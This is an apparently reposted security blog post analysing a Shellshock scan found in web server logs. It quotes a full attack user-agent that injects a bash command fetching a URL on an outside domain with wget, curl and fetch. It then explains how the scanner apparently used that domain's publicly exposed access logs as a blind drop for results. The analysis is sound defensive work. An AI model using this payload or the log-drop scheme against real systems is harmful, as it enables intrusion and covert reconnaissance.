神刀安全网

Indirect shellshock scanning through public logfiles

One of my friends noted that he’d spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 – – [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c ‘wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST’"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Indirect shellshock scanning through public logfiles

Seasonally-appropriate designer labels.  Doesn’t really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck – try to download the page:

 –2016-04-30 13:38:26–  http://closettransfer.com/IPTRANSITTEST

Resolving closettransfer.com (closettransfer.com)… 98.138.19.143

Connecting to closettransfer.com (closettransfer.com)|98.138.19.143|:80… connected.

HTTP request sent, awaiting response…  404 Not Found

2016-04-30 13:38:26 ERROR 404: Not Found.


They weren’t sending a malicious payload – and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people’s logfiles… wait a second.  Logfiles.  What if closettransfer.com had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:

Indirect shellshock scanning through public logfiles

Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn’t dig further.

It’s pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":

Indirect shellshock scanning through public logfiles

Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector:  they’re completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways.  At some point, the controller wants to get the entries.  He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:


XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" "closettransfer.com"

Clever.

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » Indirect shellshock scanning through public logfiles

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址